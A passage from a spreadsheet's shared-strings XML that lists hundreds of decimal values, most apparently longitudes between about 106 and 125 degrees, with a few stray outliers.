    <t>106.81754</t>
  </si>
  <si>
    <t>107.18392</t>
  </si>
  <si>
    <t>106.83332</t>
  </si>
  <si>
    <t>107.18214</t>
  </si>
  <si>
    <t>106.75600</t>
  </si>
  <si>
    <t>106.84927</t>
  </si>
  <si>
    <t>106.88292</t>
  </si>
  <si>
    <t>106.82520</t>
  </si>
  <si>
    <t>106.87345</t>
  </si>
  <si>
    <t>106.69525</t>
  </si>
  <si>
    <t>106.69943</t>
  </si>
  <si>
    <t>106.82644</t>
  </si>
  <si>
    <t>106.97005</t>
  </si>
  <si>
    <t>107.16558</t>
  </si>
  <si>
    <t>106.89695</t>
  </si>
  <si>
    <t>106.90758</t>
  </si>
  <si>
    <t>107.04890</t>
  </si>
  <si>
    <t>106.73102</t>
  </si>
  <si>
    <t>106.92132</t>
  </si>
  <si>
    <t>107.05351</t>
  </si>
  <si>
    <t>106.84715</t>
  </si>
  <si>
    <t>106.98675</t>
  </si>
  <si>
    <t>106.98289</t>
  </si>
  <si>
    <t>106.90171</t>
  </si>
  <si>
    <t>106.81444</t>
  </si>
  <si>
    <t>106.93723</t>
  </si>
  <si>
    <t>106.77354</t>
  </si>
  <si>
    <t>106.69635</t>
  </si>
  <si>
    <t>106.74947</t>
  </si>
  <si>
    <t>106.72274</t>
  </si>
  <si>
    <t>107.01829</t>
  </si>
  <si>
    <t>106.90628</t>
  </si>
  <si>
    <t>106.69626</t>
  </si>
  <si>
    <t>106.81884</t>
  </si>
  <si>
    <t>106.76531</t>
  </si>
  <si>
    <t>106.82834</t>
  </si>
  <si>
    <t>106.81239</t>
  </si>
  <si>
    <t>106.71876</t>
  </si>
  <si>
    <t>107.15243</t>
  </si>
  <si>
    <t>106.74575</t>
  </si>
  <si>
    <t>107.01694</t>
  </si>
  <si>
    <t>106.81579</t>
  </si>
  <si>
    <t>106.81313</t>
  </si>
  <si>
    <t>107.04397</t>
  </si>
  <si>
    <t>106.85955</t>
  </si>
  <si>
    <t>106.95157</t>
  </si>
  <si>
    <t>106.73402</t>
  </si>
  <si>
    <t>106.76558</t>
  </si>
  <si>
    <t>107.09488</t>
  </si>
  <si>
    <t>106.81167</t>
  </si>
  <si>
    <t>106.76485</t>
  </si>
  <si>
    <t>106.68764</t>
  </si>
  <si>
    <t>106.88108</t>
  </si>
  <si>
    <t>106.76050</t>
  </si>
  <si>
    <t>106.85754</t>
  </si>
  <si>
    <t>106.87747</t>
  </si>
  <si>
    <t>107.01980</t>
  </si>
  <si>
    <t>106.76913</t>
  </si>
  <si>
    <t>106.60086</t>
  </si>
  <si>
    <t>106.95733</t>
  </si>
  <si>
    <t>106.98856</t>
  </si>
  <si>
    <t>106.98868</t>
  </si>
  <si>
    <t>106.76307</t>
  </si>
  <si>
    <t>106.98669</t>
  </si>
  <si>
    <t>106.82361</t>
  </si>
  <si>
    <t>106.99046</t>
  </si>
  <si>
    <t>106.99188</t>
  </si>
  <si>
    <t>106.76459</t>
  </si>
  <si>
    <t>106.87282</t>
  </si>
  <si>
    <t>106.93489</t>
  </si>
  <si>
    <t>107.07830</t>
  </si>
  <si>
    <t>107.04887</t>
  </si>
  <si>
    <t>106.82323</t>
  </si>
  <si>
    <t>107.07966</t>
  </si>
  <si>
    <t>106.82398</t>
  </si>
  <si>
    <t>106.77131</t>
  </si>
  <si>
    <t>107.28604</t>
  </si>
  <si>
    <t>106.69510</t>
  </si>
  <si>
    <t>106.81700</t>
  </si>
  <si>
    <t>106.75354</t>
  </si>
  <si>
    <t>106.85022</t>
  </si>
  <si>
    <t>106.85047</t>
  </si>
  <si>
    <t>106.69822</t>
  </si>
  <si>
    <t>106.70026</t>
  </si>
  <si>
    <t>106.82121</t>
  </si>
  <si>
    <t>106.81811</t>
  </si>
  <si>
    <t>106.74668</t>
  </si>
  <si>
    <t>106.83636</t>
  </si>
  <si>
    <t>106.75622</t>
  </si>
  <si>
    <t>106.76228</t>
  </si>
  <si>
    <t>106.71559</t>
  </si>
  <si>
    <t>107.07092</t>
  </si>
  <si>
    <t>106.75077</t>
  </si>
  <si>
    <t>106.72732</t>
  </si>
  <si>
    <t>106.76922</t>
  </si>
  <si>
    <t>107.16430</t>
  </si>
  <si>
    <t>106.96749</t>
  </si>
  <si>
    <t>106.69213</t>
  </si>
  <si>
    <t>106.82203</t>
  </si>
  <si>
    <t>106.66911</t>
  </si>
  <si>
    <t>106.82118</t>
  </si>
  <si>
    <t>107.01599</t>
  </si>
  <si>
    <t>107.06751</t>
  </si>
  <si>
    <t>106.69665</t>
  </si>
  <si>
    <t>106.82953</t>
  </si>
  <si>
    <t>106.93928</t>
  </si>
  <si>
    <t>107.29851</t>
  </si>
  <si>
    <t>106.99194</t>
  </si>
  <si>
    <t>106.96763</t>
  </si>
  <si>
    <t>106.96769</t>
  </si>
  <si>
    <t>106.81941</t>
  </si>
  <si>
    <t>106.82396</t>
  </si>
  <si>
    <t>106.81885</t>
  </si>
  <si>
    <t>106.81698</t>
  </si>
  <si>
    <t>106.78680</t>
  </si>
  <si>
    <t>117.14547</t>
  </si>
  <si>
    <t>106.73667</t>
  </si>
  <si>
    <t>106.88138</t>
  </si>
  <si>
    <t>106.84206</t>
  </si>
  <si>
    <t>106.73814</t>
  </si>
  <si>
    <t>106.81753</t>
  </si>
  <si>
    <t>106.96904</t>
  </si>
  <si>
    <t>106.81019</t>
  </si>
  <si>
    <t>106.72814</t>
  </si>
  <si>
    <t>107.04216</t>
  </si>
  <si>
    <t>106.69199</t>
  </si>
  <si>
    <t>106.81888</t>
  </si>
  <si>
    <t>106.71736</t>
  </si>
  <si>
    <t>106.81012</t>
  </si>
  <si>
    <t>106.69679</t>
  </si>
  <si>
    <t>106.81814</t>
  </si>
  <si>
    <t>106.69755</t>
  </si>
  <si>
    <t>106.87334</t>
  </si>
  <si>
    <t>106.95686</t>
  </si>
  <si>
    <t>106.81773</t>
  </si>
  <si>
    <t>107.02665</t>
  </si>
  <si>
    <t>111.08489</t>
  </si>
  <si>
    <t>106.81831</t>
  </si>
  <si>
    <t>106.72735</t>
  </si>
  <si>
    <t>106.76418</t>
  </si>
  <si>
    <t>106.72987</t>
  </si>
  <si>
    <t>107.29308</t>
  </si>
  <si>
    <t>106.81788</t>
  </si>
  <si>
    <t>106.82888</t>
  </si>
  <si>
    <t>111.94840</t>
  </si>
  <si>
    <t>106.71805</t>
  </si>
  <si>
    <t>106.69660</t>
  </si>
  <si>
    <t>106.83108</t>
  </si>
  <si>
    <t>106.71410</t>
  </si>
  <si>
    <t>106.96588</t>
  </si>
  <si>
    <t>106.59642</t>
  </si>
  <si>
    <t>106.76094</t>
  </si>
  <si>
    <t>106.81628</t>
  </si>
  <si>
    <t>107.04433</t>
  </si>
  <si>
    <t>106.73826</t>
  </si>
  <si>
    <t>106.71402</t>
  </si>
  <si>
    <t>107.27500</t>
  </si>
  <si>
    <t>106.59593</t>
  </si>
  <si>
    <t>107.10029</t>
  </si>
  <si>
    <t>106.98913</t>
  </si>
  <si>
    <t>106.90004</t>
  </si>
  <si>
    <t>106.93462</t>
  </si>
  <si>
    <t>106.92288</t>
  </si>
  <si>
    <t>106.58603</t>
  </si>
  <si>
    <t>106.97304</t>
  </si>
  <si>
    <t>107.28739</t>
  </si>
  <si>
    <t>106.76378</t>
  </si>
  <si>
    <t>107.06359</t>
  </si>
  <si>
    <t>106.74485</t>
  </si>
  <si>
    <t>106.74470</t>
  </si>
  <si>
    <t>107.07833</t>
  </si>
  <si>
    <t>106.73396</t>
  </si>
  <si>
    <t>106.73352</t>
  </si>
  <si>
    <t>106.73386</t>
  </si>
  <si>
    <t>106.73499</t>
  </si>
  <si>
    <t>106.74266</t>
  </si>
  <si>
    <t>107.16414</t>
  </si>
  <si>
    <t>106.85858</t>
  </si>
  <si>
    <t>109.63418</t>
  </si>
  <si>
    <t>106.74644</t>
  </si>
  <si>
    <t>108.86181</t>
  </si>
  <si>
    <t>106.72748</t>
  </si>
  <si>
    <t>107.02934</t>
  </si>
  <si>
    <t>106.82908</t>
  </si>
  <si>
    <t>107.07769</t>
  </si>
  <si>
    <t>106.73143</t>
  </si>
  <si>
    <t>106.82098</t>
  </si>
  <si>
    <t>106.72085</t>
  </si>
  <si>
    <t>106.72079</t>
  </si>
  <si>
    <t>140.66402</t>
  </si>
  <si>
    <t>106.74145</t>
  </si>
  <si>
    <t>106.73350</t>
  </si>
  <si>
    <t>107.27615</t>
  </si>
  <si>
    <t>106.71542</t>
  </si>
  <si>
    <t>106.73349</t>
  </si>
  <si>
    <t>107.05542</t>
  </si>
  <si>
    <t>106.70187</t>
  </si>
  <si>
    <t>106.70266</t>
  </si>
  <si>
    <t>107.09507</t>
  </si>
  <si>
    <t>106.70786</t>
  </si>
  <si>
    <t>107.04534</t>
  </si>
  <si>
    <t>106.72802</t>
  </si>
  <si>
    <t>107.14185</t>
  </si>
  <si>
    <t>106.83827</t>
  </si>
  <si>
    <t>107.04542</t>
  </si>
  <si>
    <t>106.77464</t>
  </si>
  <si>
    <t>106.77454</t>
  </si>
  <si>
    <t>106.98873</t>
  </si>
  <si>
    <t>121.39939</t>
  </si>
  <si>
    <t>106.82776</t>
  </si>
  <si>
    <t>106.84925</t>
  </si>
  <si>
    <t>106.76794</t>
  </si>
  <si>
    <t>140.50338</t>
  </si>
  <si>
    <t>106.82917</t>
  </si>
  <si>
    <t>107.25585</t>
  </si>
  <si>
    <t>106.82685</t>
  </si>
  <si>
    <t>107.25656</t>
  </si>
  <si>
    <t>110.42938</t>
  </si>
  <si>
    <t>110.43109</t>
  </si>
  <si>
    <t>110.43449</t>
  </si>
  <si>
    <t>110.44564</t>
  </si>
  <si>
    <t>110.45333</t>
  </si>
  <si>
    <t>110.44914</t>
  </si>
  <si>
    <t>106.97070</t>
  </si>
  <si>
    <t>107.27541</t>
  </si>
  <si>
    <t>110.47915</t>
  </si>
  <si>
    <t>110.97208</t>
  </si>
  <si>
    <t>106.85748</t>
  </si>
  <si>
    <t>110.43147</t>
  </si>
  <si>
    <t>110.39192</t>
  </si>
  <si>
    <t>117.15126</t>
  </si>
  <si>
    <t>114.76582</t>
  </si>
  <si>
    <t>106.98731</t>
  </si>
  <si>
    <t>106.84895</t>
  </si>
  <si>
    <t>112.77029</t>
  </si>
  <si>
    <t>115.22094</t>
  </si>
  <si>
    <t>106.68806</t>
  </si>
  <si>
    <t>98.31426</t>
  </si>
  <si>
    <t>106.78173</t>
  </si>
  <si>
    <t>106.82709</t>
  </si>
  <si>
    <t>106.85752</t>
  </si>
  <si>
    <t>106.88190</t>
  </si>
  <si>
    <t>106.87453</t>
  </si>
  <si>
    <t>106.88192</t>
  </si>
  <si>
    <t>112.00002</t>
  </si>
  <si>
    <t>106.81334</t>
  </si>
  <si>
    <t>112.11431</t>
  </si>
  <si>
    <t>113.24937</t>
  </si>
  <si>
    <t>106.69349</t>
  </si>
  <si>
    <t>112.23806</t>
  </si>
  <si>
    <t>119.45716</t>
  </si>
  <si>
    <t>106.94408</t>
  </si>
  <si>
    <t>119.53244</t>
  </si>
  <si>
    <t>106.76926</t>
  </si>
  <si>
    <t>106.81228</t>
  </si>
  <si>
    <t>106.81214</t>
  </si>
  <si>
    <t>119.48819</t>
  </si>
  <si>
    <t>106.91618</t>
  </si>
  <si>
    <t>106.91620</t>
  </si>
  <si>
    <t>120.69256</t>
  </si>
  <si>
    <t>120.73606</t>
  </si>
  <si>
    <t>106.79820</t>
  </si>
  <si>
    <t>106.91599</t>
  </si>
  <si>
    <t>106.91597</t>
  </si>
  <si>
    <t>106.89192</t>
  </si>
  <si>
    <t>114.89905</t>
  </si>
  <si>
    <t>107.69623</t>
  </si>
  <si>
    <t>106.82044</t>
  </si>
  <si>
    <t>109.62175</t>
  </si>
  <si>
    <t>107.61303</t>
  </si>
  <si>
    <t>106.82091</t>
  </si>
  <si>
    <t>112.00389</t>
  </si>
  <si>
    <t>112.00974</t>
  </si>
  <si>
    <t>102.53559</t>
  </si>
  <si>
    <t>112.01170</t>
  </si>
  <si>
    <t>112.01180</t>
  </si>
  <si>
    <t>118.72959</t>
  </si>
  <si>
    <t>118.69913</t>
  </si>
  <si>
    <t>118.66668</t>
  </si>
  <si>
    <t>118.69947</t>
  </si>
  <si>
    <t>106.91602</t>
  </si>
  <si>
    <t>124.87645</t>
  </si>
  <si>
    <t>120.29406</t>
  </si>
  <si>
    <t>110.40809</t>
  </si>
  <si>
    <t>123.60178</t>
  </si>
  <si>
    <t>120.00000</t>
  </si>
  <si>
    <t>123.41269</t>
  </si>
  <si>
    <t>123.55760</t>
  </si>
  <si>
    <t>125.05717</t>
  </si>
  <si>
    <t>123.60622</t>
  </si>
  <si>
    <t>120.27912</t>
  </si>
  <si>
    <t>123.61085</t>
  </si>
  <si>
    <t>123.61524</t>
  </si>
  <si>
    <t>107.91228</t>
  </si>
  <si>
    <t>120.15241</t>
  </si>
  <si>
    <t>120.29531</t>
  </si>
  <si>
    <t>106.84789</t>
  </si>
  <si>
    <t>120.27723</t>
  </si>
  <si>
    <t>120.26369</t>
  </si>
  <si>
    <t>120.26461</t>
  </si>
  <si>
    <t>106.91615</t>
  </si>
  <si>
    <t>98.84366</t>
  </si>
  <si>
    <t>124.23552</t>
  </si>
  <si>
    <t>124.76083</t>
  </si>
  <si>
    <t>106.83663</t>
  </si>
  <si>
    <t>118.61492</t>
  </si>
  <si>
    <t>110.33511</t>
  </si>
  <si>
    <t>112.60570</t>
  </si>
  <si>
    <t>112.52742</t>
  </si>
  <si>
    <t>112.63093</t>
  </si>
  <si>
    <t>112.58176</t>
  </si>
  <si>
    <t>111.94648</t>
  </si>
  <si>
    <t>111.91161</t>
  </si>
  <si>
    <t>112.72540</t>
  </si>
  <si>
    <t>112.71437</t>
  </si>
  <si>
    <t>112.71425</t>
  </si>
  <si>
    <t>112.61068</t>
  </si>
  <si>
    <t>111.77548</t>
  </si>
  <si>
    <t>107.40234</t>
  </si>
  <si>
    <t>111.79087</t>
  </si>
  <si>
    <t>106.88309</t>
  </si>
  <si>
    <t>109.68733</t>
  </si>
  <si>
    <t>106.77415</t>
  </si>
  <si>
    <t>106.87454</t>
  </si>
  <si>
    <t>106.69413</t>
  </si>
  <si>
    <t>106.85524</t>
  </si>
  <si>
    <t>108.69465</t>
  </si>
  <si>
    <t>107.09425</t>
  </si>
  <si>
    <t>98.65517</t>
  </si>
  <si>
    <t>102.74856</t>
  </si>
  <si>
    <t>118.67004</t>
  </si>
  <si>
    <t>100.37273</t>
  </si>
  <si>
    <t>122.78925</t>
  </si>
  <si>
    <t>100.37502</t>
  </si>
  <si>
    <t>109.34988</t>
  </si>
  <si>
    <t>112.47490</t>
  </si>
  <si>
    <t>107.57262</t>
  </si>
  <si>
    <t>117.58162</t>
  </si>
  <si>
    <t>106.71883</t>
  </si>
  <si>
    <t>117.60437</t>
  </si>
  <si>
    <t>109.10421</t>
  </si>
  <si>
    <t>106.85774</t>
  </si>
  <si>
    <t>107.55703</t>
  </si>
  <si>
    <t>106.71556</t>
  </si>
  <si>
    <t>106.91916</t>
  </si>
  <si>
    <t>106.62117</t>
  </si>
  <si>
    <t>106.69374</t>
  </si>
  <si>
    <t>106.77082</t>
  </si>
  <si>
    <t>106.76490</t>
  </si>
  <si>
    <t>100.13325</t>
  </si>
  <si>
    <t>100.13270</t>
  </si>
  <si>
    <t>106.93628</t>
  </si>
  <si>
    <t>106.97645</t>
  </si>
  <si>
    <t>106.96757</t>
  </si>
  <si>
    <t>106.94356</t>
  </si>
  <si>
    <t>116.90643</t>
  </si>
  <si>
    <t>106.82405</t>
  </si>
  <si>
    <t>117.24192</t>
  </si>
  <si>
    <t>106.81792</t>
  </si>
  <si>
    <t>106.79761</t>
  </si>
  <si>
    <t>106.79759</t>
  </si>
  <si>
    <t>106.76034</t>
  </si>
  <si>
    <t>106.75899</t>
  </si>
  <si>
    <t>106.80585</t>
  </si>
  <si>
    <t>106.80601</t>
  </si>
  <si>
    <t>106.88052</t>
  </si>
  <si>
    <t>116.84757</t>
  </si>
  <si>
    <t>106.82727</t>
  </si>
  <si>
    <t>106.71222</t>
  </si>
  <si>
    <t>106.75980</t>
  </si>
  <si>
    <t>106.72570</t>
  </si>
  <si>
    <t>112.58802</t>
  </si>
  <si>
    <t>106.76925</t>
  </si>
  <si>
    <t>106.89385</t>
  </si>
  <si>
    <t>106.75684</t>
  </si>
  <si>
    <t>106.91074</t>
  </si>
  <si>
    <t>106.87440</t>
  </si>
  <si>
    <t>106.90563</t>
  </si>
  <si>
    <t>106.71944</t>
  </si>
  <si>
    <t>107.75510</t>
  </si>
  <si>
    <t>107.01881</t>
  </si>
  <si>
    <t>106.77010</t>
  </si>
  <si>
    <t>107.00750</t>
  </si>
  <si>
    <t>110.21193</t>
  </si>
  <si>
    <t>106.96974</t>
  </si>
  <si>
    <t>106.83878</t>
  </si>
  <si>
    <t>106.74097</t>
  </si>
  <si>
    <t>107.01700</t>
  </si>
  <si>
    <t>107.00050</t>
  </si>
  <si>
    <t>97.81969</t>
  </si>
  <si>
    <t>106.82033</t>
  </si>
  <si>
    <t>129.45387</t>
  </si>
  <si>
    <t>114.38570</t>
  </si>
  <si>
    <t>106.81540</t>
  </si>
  <si>
    <t>106.91549</t>
  </si>
  <si>
    <t>98.72423</t>
  </si>
  <si>
    <t>106.87054</t>
  </si>
  <si>
    <t>111.99471</t>
  </si>
  <si>
    <t>106.78758</t>
  </si>
  <si>
    <t>106.73043</t>
  </si>
  <si>
    <t>110.45978</t>
  </si>
  <si>
    <t>117.11291</t>
  </si>
  <si>
    <t>117.09627</t>
  </si>
  <si>
    <t>114.35070</t>
  </si>
  <si>
    <t>96.52577</t>
  </si>
  <si>
    <t>120.25056</t>
  </si>
  <si>
    <t>117.16598</t>
  </si>
  <si>
    <t>106.86604</t>
  </si>
  <si>
    <t>106.80747</t>
  </si>
  <si>
    <t>109.30459</t>
  </si>
  <si>
    <t>109.95936</t>
  </si>
  <si>
    <t>106.86628</t>
  </si>
  <si>
    <t>110.05245</t>
  </si>
  <si>
    <t>106.84827</t>
  </si>
  <si>
    <t>106.85130</t>
  </si>
  <si>
    <t>106.84975</t>
  </si>
  <si>
    <t>106.95800</t>
  </si>
  <si>
    <t>106.95805</t>
  </si>
  <si>
    <t>120.384104</t>
  </si>
  <si>
    <t>120.030109</t>
  </si>
  <si>
    <t>120.222702</t>
  </si>
  <si>
    <t>106.802452</t>
  </si>
  <si>
    <t>106.651188</t>
  </si>
  <si>
    <t>112.921633</t>
  </si>
  <si>
    <t>112.922298</t>
  </si>
  <si>
    <t>106.779256</t>
  </si>
  <si>
    <t>112.663066</t>
  </si>
  <si>
    <t>107.629666</t>
  </si>
  <si>
    <t>106.935634</t>
  </si>
  <si>
    <t>109.146702</t>
  </si>
  <si>
    <t>107.552972</t>
  </si>
  <si>
    <t>107.553320</t>
  </si>
  <si>
    <t>117.099967</t>
  </si>
  <si>
    <t>106.860664</t>
  </si>
  <si>
    <t>106.867148</t>
  </si>
  <si>
    <t>112.919486761</t>
  </si>
  <si>
    <t>117.168635130</t>
  </si>
  <si>
    <t>117.167456746</t>
  </si>
  <si>
    <t>117.167531848</t>
  </si>
  <si>
    <t>117.166501105</t>
  </si>
  <si>
    <t>117.163073900</t>
  </si>
  <si>
    <t>117.132096291</t>
  </si>
  <si>
    <t>117.123291492</t>
  </si>
  <si>
    <t>106.827149391</t>
  </si>
  <si>
    <t>113.288274407</t>
  </si>
  <si>
    <t>113.336290057</t>
  </si>
  <si>
    <t>117.134485245</t>
  </si>
  <si>
    <t>113.380173752</t>
  </si>
  <si>
    <t>113.381652832</t>
  </si>
  <si>
    <t>106.838496574</t>
  </si>
  <si>
    <t>113.956330116</t>
  </si>
  <si>
    <t>106.924294000</t>
  </si>
  <si>
    <t>117.139245272</t>
  </si>
  <si>
    <t>117.169096732</t>
  </si>
  <si>
    <t>117.151632827</t>
  </si>
  <si>
    <t>117.168156621</t>
  </si>
  <si>
    <t>112.505316138</t>
  </si>
  <si>
    <t>112.382065281</t>
  </si>
  <si>
    <t>117.148035270</t>
  </si>
  <si>
    <t>117.146152115</t>
  </si>
  <si>
    <t>117.163221687</t>
  </si>
  <si>
    <t>117.167366354</t>
  </si>
  <si>
    <t>117.167917764</t>
  </si>
  <si>
    <t>113.391058194</t>
  </si>
  <si>
    <t>119.477271896</t>
  </si>
  <si>
    <t>106.827889681</t>
  </si>
  <si>
    <t>117.121489048</t>
  </si>
  <si>
    <t>117.137829065</t>
  </si>
  <si>
    <t>113.387059755</t>
  </si>
  <si>
    <t>113.290334344</t>
  </si>
  <si>
    <t>111.629918218</t>
  </si>
  <si>
    <t>106.957169000</t>
  </si>
  <si>
    <t>111.616609097</t>
  </si>
  <si>
    <t>117.167163234</t>
  </si>
  <si>
    <t>115.123672386</t>
  </si>
  <si>
    <t>117.128763000</t>
  </si>
  <si>
    <t>117.176252092</t>
  </si>
  <si>
    <t>117.122604847</t>
  </si>
  <si>
    <t>117.196771759</t>
  </si>
  <si>
    <t>117.146833624</t>
  </si>
  <si>
    <t>117.118520226</t>
  </si>
  <si>
    <t>117.095135195</t>
  </si>
  <si>
    <t>117.153057882</t>
  </si>
  <si>
    <t>117.111167908</t>
  </si>
  <si>
    <t>117.128248214</t>
  </si>
  <si>
    <t>117.131752967</t>
  </si>
  <si>
    <t>117.166960154</t>
  </si>
  <si>
    <t>106.905464000</t>
  </si>
  <si>
    <t>106.834874153</t>
  </si>
  <si>
    <t>111.635888815</t>
  </si>
  <si>
    <t>111.636403799</t>
  </si>
  <si>
    <t>106.298882961</t>
  </si>
  <si>
    <t>106.915642000</t>
  </si>
  <si>
    <t>136.238263249</t>
  </si>
  <si>
    <t>136.236248016</t>
  </si>
  <si>
    <t>136.236305242</t>
  </si>
  <si>
    <t>106.677988700</t>
  </si>
  <si>
    <t>106.252834797</t>
  </si>
  <si>
    <t>117.138966322</t>
  </si>
  <si>
    <t>117.082701239</t>
  </si>
  <si>
    <t>117.125835759</t>
  </si>
  <si>
    <t>117.084489891</t>
  </si>
  <si>
    <t>117.093991229</t>
  </si>
  <si>
    <t>120.510575433</t>
  </si>
  <si>
    <t>120.509684589</t>
  </si>
  <si>
    <t>120.508947343</t>
  </si>
  <si>
    <t>120.520136552</t>
  </si>
  <si>
    <t>120.514686094</t>
  </si>
  <si>
    <t>957.32767300</t>
  </si>
  <si>
    <t>985.94911594</t>
  </si>
  <si>
    <t>953.29543948</t>
  </si>
  <si>
    <t>106.825556300</t>
  </si>
  <si>
    <t>100.355014802</t>
  </si>
  <si>
    <t>120.1202846</t>
  </si>
  <si>
    <t>116.3188648</t>
  </si>
  <si>
    <t>110.4560950</t>
  </si>
  <si>
    <t>107.5562230</t>
  </si>
  <si>
    <t>110.4489137</t>
  </si>
  <si>
    <t>126.0186768</t>
  </si>
  <si>
    <t>116.3234997</t>
  </si>
  <si>
    <t>106.8219566</t>
  </si>
  <si>
    <t>105.1825047</t>
  </si>
  <si>
    <t>115.2546501</t>
  </si>
  <si>
    <t>115.0804567</t>
  </si>
  <si>
    <t>115.6124223</t>
  </si>
  <si>
    <t>115.6124246</t>
  </si>
  <si>
    <t>107.0187449</t>
  </si>
  <si>
    <t>115.5873406</t>
  </si>
  <si>
    <t>115.6164237</t>
  </si>
  <si>
    <t>102.2745632</t>
  </si>
  <si>
    <t>117.1683227</t>
  </si>
  <si>
    <t>985.415511</t>
  </si>
  <si>
    <t>235.14605</t>
  </si>
  <si>
    <t>115.1729554</t>
  </si>
  <si>
    <t>115.0906384</t>
  </si>
  <si>
    <t>115.6120706</t>
  </si>
  <si>
    <t>115.6120276</t>
  </si>
  <si>
    <t>115.6692834</t>
  </si>
  <si>
    <t>115.6356377</t>
  </si>
  <si>
    <t>115.0909518</t>
  </si>
  <si>
    <t>115.6892967</t>
  </si>
  <si>
    <t>115.3333875</t>
  </si>
  <si>
    <t>115.6323079</t>
  </si>
  <si>
    <t>115.6156325</t>
  </si>
  <si>
    <t>115.5476601</t>
  </si>
  <si>
    <t>115.5579758</t>
  </si>
  <si>
    <t>115.6994280</t>
  </si>
  <si>
    <t>115.4261705</t>
  </si>
  <si>
    <t>115.6174994</t>
  </si>
  <si>
    <t>115.6175081</t>
  </si>
  <si>
    <t>115.6139912</t>
  </si>
  <si>
    <t>115.6145436</t>
  </si>
  <si>
    <t>115.6145382</t>
  </si>
  <si>
    <t>115.6126714</t>
  </si>
  <si>
    <t>115.3838007</t>
  </si>
  <si>
    <t>106.8139060</t>
  </si>
  <si>
    <t>115.6220380</t>
  </si>
  <si>
    <t>106.8271494</t>
  </si>
  <si>
    <t>102.3925857</t>
  </si>
  <si>
    <t>115.6211910</t>
  </si>
  <si>
    <t>115.6420684</t>
  </si>
  <si>
    <t>115.6243229</t>
  </si>
  <si>
    <t>115.5681252</t>
  </si>
  <si>
    <t>115.4398927</t>
  </si>
  <si>
    <t>106.8260920</t>
  </si>
  <si>
    <t>106.8277923</t>
  </si>
  <si>
    <t>115.5815363</t>
  </si>
  <si>
    <t>115.5840468</t>
  </si>
  <si>
    <t>115.6137901</t>
  </si>
  <si>
    <t>115.4463206</t>
  </si>
  <si>
    <t>115.4393018</t>
  </si>
  <si>
    <t>106.8254972</t>
  </si>
  <si>
    <t>115.5635952</t>
  </si>
  <si>
    <t>106.8214717</t>
  </si>
  <si>
    <t>115.6329597</t>
  </si>
  <si>
    <t>115.6156540</t>
  </si>
  <si>
    <t>115.5958179</t>
  </si>
  <si>
    <t>109.3496490</t>
  </si>
  <si>
    <t>106.8578155</t>
  </si>
  <si>
    <t>110.5799243</t>
  </si>
  <si>
    <t>123.3359957</t>
  </si>
  <si>
    <t>123.2578951</t>
  </si>
  <si>
    <t>107.1479530</t>
  </si>
  <si>
    <t>106.8944694</t>
  </si>
  <si>
    <t>107.2237794</t>
  </si>
  <si>
    <t>110.4229081</t>
  </si>
  <si>
    <t>109.6886319</t>
  </si>
  <si>
    <t>123.6494493</t>
  </si>
  <si>
    <t>984.425376</t>
  </si>
  <si>
    <t>106.9694406</t>
  </si>
  <si>
    <t>111.5598118</t>
  </si>
  <si>
    <t>110.1821664</t>
  </si>
  <si>
    <t>953.9248466</t>
  </si>
  <si>
    <t>973.4299240</t>
  </si>
  <si>
    <t>107.58175135</t>
  </si>
  <si>
    <t>107.67699122</t>
  </si>
  <si>
    <t>107.63882875</t>
  </si>
  <si>
    <t>107.64638186</t>
  </si>
  <si>
    <t>107.74815559</t>
  </si>
  <si>
    <t>109.29443836</t>
  </si>
  <si>
    <t>109.26224917</t>
  </si>
  <si>
    <t>112.52394676</t>
  </si>
  <si>
    <t>112.53294513</t>
  </si>
  <si>
    <t>106.92838940</t>
  </si>
  <si>
    <t>106.95185000</t>
  </si>
  <si>
    <t>106.95911150</t>
  </si>
  <si>
    <t>101.15532875</t>
  </si>
  <si>
    <t>106.82277203</t>
  </si>
  <si>
    <t>106.81210756</t>
  </si>
  <si>
    <t>106.82372321</t>
  </si>
  <si>
    <t>106.97126678</t>
  </si>
  <si>
    <t>106.83958518</t>
  </si>
  <si>
    <t>123.64957809</t>
  </si>
  <si>
    <t>123.49770069</t>
  </si>
  <si>
    <t>123.49885941</t>
  </si>
  <si>
    <t>123.59012604</t>
  </si>
  <si>
    <t>123.25875878</t>
  </si>
  <si>
    <t>117.47389913</t>
  </si>
  <si>
    <t>107.17819703</t>
  </si>
  <si>
    <t>107.20374141</t>
  </si>
  <si>
    <t>107.13679855</t>
  </si>
  <si>
    <t>107.13997159</t>
  </si>
  <si>
    <t>107.13364047</t>
  </si>
  <si>
    <t>101.42680049</t>
  </si>
  <si>
    <t>106.84796535</t>
  </si>
  <si>
    <t>106.80172416</t>
  </si>
  <si>
    <t>122.94588447</t>
  </si>
  <si>
    <t>127.76099682</t>
  </si>
  <si>
    <t>115.38494924</t>
  </si>
  <si>
    <t>115.36331177</t>
  </si>
  <si>
    <t>115.38358927</t>
  </si>
  <si>
    <t>115.42929947</t>
  </si>
  <si>
    <t>115.25522411</t>
  </si>
  <si>
    <t>115.25684416</t>
  </si>
  <si>
    <t>106.75593138</t>
  </si>
  <si>
    <t>106.74600919</t>
  </si>
  <si>
    <t>106.77050114</t>
  </si>
  <si>
    <t>106.76924330</t>
  </si>
  <si>
    <t>106.76942794</t>
  </si>
  <si>
    <t>106.77031050</t>
  </si>
  <si>
    <t>106.75798595</t>
  </si>
  <si>
    <t>106.74174786</t>
  </si>
  <si>
    <t>106.77184138</t>
  </si>
  <si>
    <t>106.80971018</t>
  </si>
  <si>
    <t>106.75984056</t>
  </si>
  <si>
    <t>106.81118217</t>
  </si>
  <si>
    <t>106.82762210</t>
  </si>
  <si>
    <t>106.75700576</t>
  </si>
  <si>
    <t>106.81095958</t>
  </si>
  <si>
    <t>106.82181234</t>
  </si>
  <si>
    <t>106.75650024</t>
  </si>
  <si>
    <t>106.83096098</t>
  </si>
  <si>
    <t>106.82070285</t>
  </si>
  <si>
    <t>106.85753097</t>
  </si>
  <si>
    <t>106.95154429</t>
  </si>
  <si>
    <t>106.91724210</t>
  </si>
  <si>
    <t>106.83096886</t>
  </si>
  <si>
    <t>100.71643353</t>
  </si>
  <si>
    <t>112.15319574</t>
  </si>
  <si>
    <t>110.20351410</t>
  </si>
  <si>
    <t>110.46227217</t>
  </si>
  <si>
    <t>112.41848230</t>
  </si>
  <si>
    <t>116.10313695</t>
  </si>
  <si>
    <t>111.62872553</t>
  </si>
  <si>
    <t>112.92254448</t>
  </si>
  <si>
    <t>112.62286663</t>
  </si>
  <si>
    <t>129.18096994</t>
  </si>
  <si>
    <t>116.12966716</t>
  </si>
  <si>
    <t>986.7952108</t>
  </si>
  <si>
    <t>986.4551067</t>
  </si>
  <si>
    <t>111.54235482</t>
  </si>
  <si>
